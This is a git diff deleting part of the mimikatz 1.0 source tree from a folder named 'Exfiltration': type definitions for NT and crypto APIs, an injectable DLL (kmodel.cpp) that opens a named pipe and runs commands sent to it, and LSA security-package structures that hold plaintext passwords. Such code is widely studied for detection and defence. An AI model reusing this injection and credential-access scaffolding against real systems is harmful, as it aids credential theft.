Diffstat (limited to 'Exfiltration/mimikatz-1.0/commun')
-rw-r--r--Exfiltration/mimikatz-1.0/commun/globdefs.h128
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_32.icobin4286 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_48.icobin9662 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.icobin15086 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.icobin15086 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.icobin15086 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.icobin1150 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_32.icobin4286 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_48.icobin9662 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.icobin15086 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.icobin4286 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.icobin9662 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.icobin15086 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/kmodel.cpp139
-rw-r--r--Exfiltration/mimikatz-1.0/commun/kmodel.h21
-rw-r--r--Exfiltration/mimikatz-1.0/commun/secpkg.h239
16 files changed, 0 insertions, 527 deletions
diff --git a/Exfiltration/mimikatz-1.0/commun/globdefs.h b/Exfiltration/mimikatz-1.0/commun/globdefs.h
deleted file mode 100644
index d579a3b..0000000
--- a/Exfiltration/mimikatz-1.0/commun/globdefs.h
+++ /dev/null
@@ -1,128 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#pragma warning(disable:4530)
-#include <stdio.h>
-#include <windows.h>
-#include <ntsecapi.h>
-#include <string>
-#include <vector>
-using namespace std;
-
-#define SECURITY_WIN32
-#define PAGE_SIZE 0x1000
-#define MAX_DOMAIN_LEN 24
-#define MAX_USERNAME_LEN 24
-
-#define MIMIKATZ L"mimikatz"
-#ifdef _M_X64
- #define MIMIKATZ_FULL L"mimikatz 1.0 x64 (RC)"
-#else ifdef
- #define MIMIKATZ_FULL L"mimikatz 1.0 x86 (RC)"
-#endif
-
-#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
-#define NT_INFORMATION(Status) ((((ULONG)(Status)) >> 30) == 1)
-#define NT_WARNING(Status) ((((ULONG)(Status)) >> 30) == 2)
-#define NT_ERROR(Status) ((((ULONG)(Status)) >> 30) == 3)
-
-#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
-#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
-#define STATUS_MORE_ENTRIES ((NTSTATUS)0x00000105L)
-
-#define S_SWAP(a, b) {BYTE t = S[a]; S[a] = S[b]; S[b] = t;}
-
-typedef bool (* PKIWI_LOCAL_COMMAND) (vector<wstring> * arguments);
-
-typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND {
- PKIWI_LOCAL_COMMAND ptrCommand;
- wstring commandName;
- wstring commandHelp;
- _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name, wstring help) : ptrCommand(command), commandName(name), commandHelp(help) {}
- _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name) : ptrCommand(command), commandName(name), commandHelp() {}
-} KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND, *PKIWI_MIMIKATZ_LOCAL_MODULE_COMMAND;
-
-typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE {
- wstring module;
- wstring description;
- vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> commandes;
- _KIWI_MIMIKATZ_LOCAL_MODULE(wstring leModule, wstring laDescription, vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> lesCommandes) : module(leModule), description(laDescription), commandes(lesCommandes) {}
-} KIWI_MIMIKATZ_LOCAL_MODULE, *PKIWI_MIMIKATZ_LOCAL_MODULE;
-
-typedef struct _CLIENT_ID {
- PVOID UniqueProcess;
- PVOID UniqueThread;
-} CLIENT_ID, *PCLIENT_ID;
-
-typedef const ULONG CLONG;
-typedef const UNICODE_STRING *PCUNICODE_STRING;
-typedef STRING OEM_STRING;
-typedef PSTRING POEM_STRING;
-typedef CONST STRING* PCOEM_STRING;
-
-/* System* */
-typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_006) (LPCSTR string, BYTE hash[16]);
-typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_007) (PUNICODE_STRING string, BYTE hash[16]);
-typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_025) (BYTE[16], DWORD *, BYTE[16]);
-typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_027) (BYTE[16], DWORD *, BYTE[16]);
-/* CNG */
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_STORAGE_PROVIDER) (__out NCRYPT_PROV_HANDLE *phProvider, __in_opt LPCWSTR pszProviderName, __in DWORD dwFlags);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_ENUM_KEYS) (__in NCRYPT_PROV_HANDLE hProvider, __in_opt LPCWSTR pszScope, __deref_out NCryptKeyName **ppKeyName, __inout PVOID * ppEnumState, __in DWORD dwFlags);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_KEY) (__in NCRYPT_PROV_HANDLE hProvider, __out NCRYPT_KEY_HANDLE *phKey, __in LPCWSTR pszKeyName, __in DWORD dwLegacyKeySpec, __in DWORD dwFlags);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_EXPORT_KEY) (__in NCRYPT_KEY_HANDLE hKey, __in_opt NCRYPT_KEY_HANDLE hExportKey, __in LPCWSTR pszBlobType, __in_opt NCryptBufferDesc *pParameterList, __out_opt PBYTE pbOutput, __in DWORD cbOutput, __out DWORD *pcbResult, __in DWORD dwFlags);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_GET_PROPERTY) (__in NCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PBYTE pbOutput, __in DWORD cbOutput, __out DWORD * pcbResult, __in DWORD dwFlags);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_BUFFER) (__deref PVOID pvInput);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_OBJECT) (__in NCRYPT_HANDLE hObject);
-typedef NTSTATUS (WINAPI * PBCRYPT_ENUM_REGISTERED_PROVIDERS)(__inout ULONG* pcbBuffer, __deref_opt_inout_bcount_part_opt(*pcbBuffer, *pcbBuffer) PCRYPT_PROVIDERS *ppBuffer);
-typedef VOID (WINAPI * PBCRYPT_FREE_BUFFER) (__in PVOID pvBuffer);
-
-typedef NTSTATUS (WINAPI * PBCRYPT_OPEN_ALGORITHM_PROVIDER) (__out BCRYPT_ALG_HANDLE *phAlgorithm, __in LPCWSTR pszAlgId, __in_opt LPCWSTR pszImplementation, __in ULONG dwFlags);
-typedef NTSTATUS (WINAPI * PBCRYPT_SET_PROPERTY) (__inout BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __in_bcount(cbInput) PUCHAR pbInput, __in ULONG cbInput, __in ULONG dwFlags);
-typedef NTSTATUS (WINAPI * PBCRYPT_GET_PROPERTY) (__in BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PUCHAR pbOutput, __in ULONG cbOutput, __out ULONG *pcbResult, __in ULONG dwFlags);
-typedef NTSTATUS (WINAPI * PBCRYPT_GENERATE_SYMMETRIC_KEY) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __out BCRYPT_KEY_HANDLE *phKey, __out_bcount_full_opt(cbKeyObject) PUCHAR pbKeyObject, __in ULONG cbKeyObject, __in_bcount(cbSecret) PUCHAR pbSecret, __in ULONG cbSecret, __in ULONG dwFlags);
-typedef NTSTATUS (WINAPI * PBCRYTP_DESTROY_KEY) (__inout BCRYPT_KEY_HANDLE hKey);
-typedef NTSTATUS (WINAPI * PBCRYTP_CLOSE_ALGORITHM_PROVIDER) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __in ULONG dwFlags);
-
-/* Rtl* */
-#define RtlEqualLuid(L1, L2) (((L1)->LowPart == (L2)->LowPart) && ((L1)->HighPart == (L2)->HighPart))
-typedef NTSTATUS (WINAPI * PRTL_CREATE_USER_THREAD) (__in HANDLE Process, __in_opt PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, __in char Flags, __in_opt ULONG ZeroBits, __in_opt SIZE_T MaximumStackSize, __in_opt SIZE_T CommittedStackSize, __in PTHREAD_START_ROUTINE StartAddress, __in_opt PVOID Parameter, __out_opt PHANDLE Thread, __out_opt PCLIENT_ID ClientId);
-typedef VOID (WINAPI * PRTL_INIT_STRING) (PSTRING DestinationString, PCSTR SourceString);
-typedef VOID (WINAPI * PRTL_INIT_UNICODESTRING) (PUNICODE_STRING DestinationString, PCWSTR SourceString);
-typedef NTSTATUS (WINAPI * PRTL_UPCASE_UNICODE_STRING_TO_OEM_STRING) (POEM_STRING DestinationString, PCUNICODE_STRING SourceString, BOOLEAN AllocateDestinationString);
-typedef VOID (WINAPI * PRTL_FREE_OEM_STRING) (POEM_STRING OemString);
-typedef PVOID (WINAPI * PRTL_LOOKUP_ELEMENT_GENERIC_TABLE_AV) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer);
-typedef enum _RTL_GENERIC_COMPARE_RESULTS (WINAPI * PRTL_AVL_COMPARE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID FirstStruct, __in PVOID SecondStruct);
-typedef PVOID (WINAPI * PRTL_AVL_ALLOCATE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in CLONG ByteSize);
-typedef VOID (WINAPI * PRTL_AVL_FREE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer);
-
-typedef struct _RTL_BALANCED_LINKS {
- struct _RTL_BALANCED_LINKS *Parent;
- struct _RTL_BALANCED_LINKS *LeftChild;
- struct _RTL_BALANCED_LINKS *RightChild;
- CHAR Balance;
- UCHAR Reserved[3];
-} RTL_BALANCED_LINKS;
-typedef RTL_BALANCED_LINKS *PRTL_BALANCED_LINKS;
-
-typedef enum _RTL_GENERIC_COMPARE_RESULTS {
- GenericLessThan,
- GenericGreaterThan,
- GenericEqual
-} RTL_GENERIC_COMPARE_RESULTS;
-
-typedef struct _RTL_AVL_TABLE {
- RTL_BALANCED_LINKS BalancedRoot;
- PVOID OrderedPointer;
- ULONG WhichOrderedElement;
- ULONG NumberGenericTableElements;
- ULONG DepthOfTree;
- PRTL_BALANCED_LINKS RestartKey;
- ULONG DeleteCount;
- PRTL_AVL_COMPARE_ROUTINE CompareRoutine;
- PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;
- PRTL_AVL_FREE_ROUTINE FreeRoutine;
- PVOID TableContext;
-} RTL_AVL_TABLE, *PRTL_AVL_TABLE;
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico
deleted file mode 100644
index 9ac92da..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico
deleted file mode 100644
index 79edffc..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico
deleted file mode 100644
index 2285d1c..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico
deleted file mode 100644
index 745963e..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico
deleted file mode 100644
index 7497143..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico
deleted file mode 100644
index 07df30f..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico
deleted file mode 100644
index 67b1100..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico
deleted file mode 100644
index 6d7f787..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico
deleted file mode 100644
index 805707a..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico
deleted file mode 100644
index a1c08e5..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico
deleted file mode 100644
index ea38a48..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico
deleted file mode 100644
index 27adde3..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/kmodel.cpp b/Exfiltration/mimikatz-1.0/commun/kmodel.cpp
deleted file mode 100644
index a87ea8f..0000000
--- a/Exfiltration/mimikatz-1.0/commun/kmodel.cpp
+++ /dev/null
@@ -1,139 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "kmodel.h"
-
-HMODULE g_hModule = NULL;
-
-BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
-{
- if (ul_reason_for_call == DLL_PROCESS_ATTACH)
- {
- g_hModule = hModule;
-
- HANDLE hThread = CreateThread(NULL, 0, &ThreadProc, NULL, 0, NULL);
- if(hThread && hThread != INVALID_HANDLE_VALUE)
- {
- return CloseHandle(hThread);
- }
- }
- return TRUE;
-}
-
-DWORD WINAPI ThreadProc(LPVOID lpParameter)
-{
- mod_pipe * monCommunicator = new mod_pipe(L"kiwi\\mimikatz");
-
- bool succes = false;
- for(DWORD nbRetry = 1; nbRetry <= 5 && !succes; nbRetry++)
- {
- succes = monCommunicator->createClient();
- if(!succes)
- {
- Sleep(3000);
- }
- }
-
- if(succes)
- {
- ptrFunctionString maFonctionString = reinterpret_cast<ptrFunctionString>(GetProcAddress(g_hModule, "getDescription"));
-
- wstring monBuffer = L"Bienvenue dans un processus distant\n\t\t\tGentil Kiwi";
- if(maFonctionString)
- {
- wstring * maDescription = new wstring();
- if(maFonctionString(maDescription))
- {
- monBuffer.append(L"\n\n");
- monBuffer.append(*maDescription);
- }
- delete maDescription;
- }
-
-
-
- if(monCommunicator->writeToPipe(monBuffer))
- {
- for(;;)
- {
- if(monCommunicator->readFromPipe(monBuffer))
- {
- wstring fonction = monBuffer;
- vector<wstring> arguments;
-
- size_t monIndex = fonction.find(L' ');
-
- if(monIndex != wstring::npos)
- {
- arguments = mod_parseur::parse(fonction.substr(monIndex + 1));
- fonction = fonction.substr(0, monIndex);
- }
-
- string procDll(fonction.begin(), fonction.end());
-
- ptrFunction maFonction = reinterpret_cast<ptrFunction>(GetProcAddress(g_hModule, procDll.c_str()));
-
- if(maFonction)
- {
- if(maFonction(monCommunicator, &arguments))
- {
- monBuffer = L"@";
- }
- else // La fonction à retourné FALSE, il y a donc anomalie bloquante sur le canal
- {
- break;
- }
- }
- else
- {
- monBuffer = L"@Méthode \'";
- monBuffer.append(fonction);
- monBuffer.append(L"\' introuvable !\n");
- }
-
- if(!monCommunicator->writeToPipe(monBuffer))
- {
- break;
- }
- }
- else
- {
- break;
- }
- }
- }
- }
-
- delete monCommunicator;
-
- FreeLibraryAndExitThread(g_hModule, 0);
- return 0;
-}
-
-bool sendTo(mod_pipe * monPipe, wstring message)
-{
- wstring reponse = L"#";
- reponse.append(message);
-
- return monPipe->writeToPipe(reponse);
-}
-
-
-__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
- bool sendOk = sendTo(monPipe, L"pong");
-
- for(vector<wstring>::iterator monArgument = mesArguments->begin(); monArgument != mesArguments->end() && sendOk; monArgument++)
- {
- wstring maReponse = L" - argument:";
- maReponse.append(*monArgument);
- sendOk = sendTo(monPipe, maReponse);
- }
-
- if(sendOk)
- sendOk = sendTo(monPipe, L"\n");
-
- return sendOk;
-}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/commun/kmodel.h b/Exfiltration/mimikatz-1.0/commun/kmodel.h
deleted file mode 100644
index 65bd912..0000000
--- a/Exfiltration/mimikatz-1.0/commun/kmodel.h
+++ /dev/null
@@ -1,21 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "globdefs.h"
-#include "mod_pipe.h"
-#include "mod_parseur.h"
-
-#define __kextdll extern "C" __declspec(dllexport)
-
-typedef bool (__cdecl * ptrFunction) (mod_pipe * monPipe, vector<wstring> * mesArguments);
-typedef bool (__cdecl * ptrFunctionString) (wstring * maDescription);
-
-BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);
-DWORD WINAPI ThreadProc(LPVOID lpParameter);
-
-bool sendTo(mod_pipe * monPipe, wstring message);
-
-__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments);
diff --git a/Exfiltration/mimikatz-1.0/commun/secpkg.h b/Exfiltration/mimikatz-1.0/commun/secpkg.h
deleted file mode 100644
index 385307d..0000000
--- a/Exfiltration/mimikatz-1.0/commun/secpkg.h
+++ /dev/null
@@ -1,239 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "globdefs.h"
-#include <sspi.h>
-#include <wincred.h>
-
-typedef struct _KIWI_GENERIC_PRIMARY_CREDENTIAL
-{
- LSA_UNICODE_STRING UserName;
- LSA_UNICODE_STRING Domaine;
- LSA_UNICODE_STRING Password;
-} KIWI_GENERIC_PRIMARY_CREDENTIAL, * PKIWI_GENERIC_PRIMARY_CREDENTIAL;
-
-typedef NTSTATUS (WINAPIV * PLSA_INITIALIZE_PROTECTED_MEMORY) ();
-
-typedef PVOID *PLSA_CLIENT_REQUEST;
-typedef LPTHREAD_START_ROUTINE SEC_THREAD_START;
-typedef LPSECURITY_ATTRIBUTES SEC_ATTRS;
-
-typedef struct _SECPKG_CLIENT_INFO {
- LUID LogonId; // Effective Logon Id
- ULONG ProcessID; // Process Id of caller
- ULONG ThreadID; // Thread Id of caller
- BOOLEAN HasTcbPrivilege; // Client has TCB
- BOOLEAN Impersonating; // Client is impersonating
- BOOLEAN Restricted; // Client is restricted
- // NT 5.1
- UCHAR ClientFlags; // Extra flags about the client
- SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; // Impersonation level of client
- // NT 6
- HANDLE ClientToken;
-} SECPKG_CLIENT_INFO, * PSECPKG_CLIENT_INFO;
-
-typedef enum _LSA_TOKEN_INFORMATION_TYPE {
- LsaTokenInformationNull, // Implies LSA_TOKEN_INFORMATION_NULL data type
- LsaTokenInformationV1, // Implies LSA_TOKEN_INFORMATION_V1 data type
- LsaTokenInformationV2 // Implies LSA_TOKEN_INFORMATION_V2 data type
-} LSA_TOKEN_INFORMATION_TYPE, *PLSA_TOKEN_INFORMATION_TYPE;
-
-typedef enum _SECPKG_NAME_TYPE {
- SecNameSamCompatible,
- SecNameAlternateId,
- SecNameFlat,
- SecNameDN,
- SecNameSPN
-} SECPKG_NAME_TYPE;
-
-typedef struct _SECPKG_CALL_INFO {
- ULONG ProcessId;
- ULONG ThreadId;
- ULONG Attributes;
- ULONG CallCount;
- PVOID MechOid; // mechanism objection identifer
-} SECPKG_CALL_INFO, * PSECPKG_CALL_INFO;
-
-typedef enum _SECPKG_SESSIONINFO_TYPE {
- SecSessionPrimaryCred // SessionInformation is SECPKG_PRIMARY_CRED
-} SECPKG_SESSIONINFO_TYPE;
-
-typedef struct _SECPKG_PRIMARY_CRED {
- LUID LogonId;
- UNICODE_STRING DownlevelName; // Sam Account Name
- UNICODE_STRING DomainName; // Netbios domain name where account is located
- UNICODE_STRING Password;
- UNICODE_STRING OldPassword;
- PSID UserSid;
- ULONG Flags;
- UNICODE_STRING DnsDomainName; // DNS domain name where account is located (if known)
- UNICODE_STRING Upn; // UPN of account (if known)
- UNICODE_STRING LogonServer;
- UNICODE_STRING Spare1;
- UNICODE_STRING Spare2;
- UNICODE_STRING Spare3;
- UNICODE_STRING Spare4;
-} SECPKG_PRIMARY_CRED, *PSECPKG_PRIMARY_CRED;
-
-typedef struct _SECPKG_SUPPLEMENTAL_CRED {
- UNICODE_STRING PackageName;
- ULONG CredentialSize;
-#ifdef MIDL_PASS
- [size_is(CredentialSize)]
-#endif // MIDL_PASS
- PUCHAR Credentials;
-} SECPKG_SUPPLEMENTAL_CRED, *PSECPKG_SUPPLEMENTAL_CRED;
-
-typedef struct _SECPKG_SUPPLEMENTAL_CRED_ARRAY {
- ULONG CredentialCount;
-#ifdef MIDL_PASS
- [size_is(CredentialCount)] SECPKG_SUPPLEMENTAL_CRED Credentials[*];
-#else // MIDL_PASS
- SECPKG_SUPPLEMENTAL_CRED Credentials[1];
-#endif // MIDL_PASS
-} SECPKG_SUPPLEMENTAL_CRED_ARRAY, *PSECPKG_SUPPLEMENTAL_CRED_ARRAY;
-
-typedef NTSTATUS (WINAPI * PLSA_CALLBACK_FUNCTION) (ULONG_PTR Argument1, ULONG_PTR Argument2, PSecBuffer InputBuffer, PSecBuffer OutputBuffer);
-
-typedef NTSTATUS (WINAPI * PLSA_CREATE_LOGON_SESSION) (IN PLUID LogonId);
-typedef NTSTATUS (WINAPI * PLSA_DELETE_LOGON_SESSION) (IN PLUID LogonId);
-typedef NTSTATUS (WINAPI * PLSA_ADD_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue, IN PLSA_STRING Credentials);
-typedef NTSTATUS (WINAPI * PLSA_GET_CREDENTIALS) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN OUT PULONG QueryContext, IN BOOLEAN RetrieveAllCredentials, IN PLSA_STRING PrimaryKeyValue, OUT PULONG PrimaryKeyLength, IN PLSA_STRING Credentials);
-typedef NTSTATUS (WINAPI * PLSA_DELETE_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue);
-typedef PVOID (WINAPI * PLSA_ALLOCATE_LSA_HEAP) (IN ULONG Length);
-typedef VOID (WINAPI * PLSA_FREE_LSA_HEAP) (IN PVOID Base);
-typedef PVOID (WINAPI * PLSA_ALLOCATE_PRIVATE_HEAP) (IN SIZE_T Length);
-typedef VOID (WINAPI * PLSA_FREE_PRIVATE_HEAP) (IN PVOID Base);
-typedef NTSTATUS (WINAPI * PLSA_ALLOCATE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG LengthRequired, OUT PVOID *ClientBaseAddress);
-typedef NTSTATUS (WINAPI * PLSA_FREE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN PVOID ClientBaseAddress);
-typedef NTSTATUS (WINAPI * PLSA_COPY_TO_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID ClientBaseAddress, IN PVOID BufferToCopy);
-typedef NTSTATUS (WINAPI * PLSA_COPY_FROM_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID BufferToCopy, IN PVOID ClientBaseAddress);
-typedef NTSTATUS (WINAPI * PLSA_IMPERSONATE_CLIENT) (VOID);
-typedef NTSTATUS (WINAPI * PLSA_UNLOAD_PACKAGE) (VOID);
-typedef NTSTATUS (WINAPI * PLSA_DUPLICATE_HANDLE) (IN HANDLE SourceHandle, OUT PHANDLE DestionationHandle);
-typedef NTSTATUS (WINAPI * PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS) (IN PLUID LogonId, IN ULONG SupplementalCredSize, IN PVOID SupplementalCreds, IN BOOLEAN Synchronous);
-typedef HANDLE (WINAPI * PLSA_CREATE_THREAD) (IN SEC_ATTRS SecurityAttributes, IN ULONG StackSize, IN SEC_THREAD_START StartFunction, IN PVOID ThreadParameter, IN ULONG CreationFlags, OUT PULONG ThreadId);
-typedef NTSTATUS (WINAPI * PLSA_GET_CLIENT_INFO) (OUT PSECPKG_CLIENT_INFO ClientInfo);
-typedef HANDLE (WINAPI * PLSA_REGISTER_NOTIFICATION) (IN SEC_THREAD_START StartFunction, IN PVOID Parameter, IN ULONG NotificationType, IN ULONG NotificationClass, IN ULONG NotificationFlags, IN ULONG IntervalMinutes, IN OPTIONAL HANDLE WaitEvent);
-typedef NTSTATUS (WINAPI * PLSA_CANCEL_NOTIFICATION) (IN HANDLE NotifyHandle);
-typedef NTSTATUS (WINAPI * PLSA_MAP_BUFFER) (IN PSecBuffer InputBuffer, OUT PSecBuffer OutputBuffer);
-typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthorityName, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, OUT PHANDLE Token, OUT PNTSTATUS SubStatus);
-typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN_EX) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, IN PVOID SessionInformation, IN SECPKG_SESSIONINFO_TYPE SessionInformationType, OUT PHANDLE Token, OUT PNTSTATUS SubStatus);
-typedef VOID (WINAPI * PLSA_AUDIT_LOGON) (IN NTSTATUS Status, IN NTSTATUS SubStatus, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthenticatingAuthority, IN PUNICODE_STRING WorkstationName, IN OPTIONAL PSID UserSid, IN SECURITY_LOGON_TYPE LogonType, IN PTOKEN_SOURCE TokenSource, IN PLUID LogonId);
-typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
-typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGEEX) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
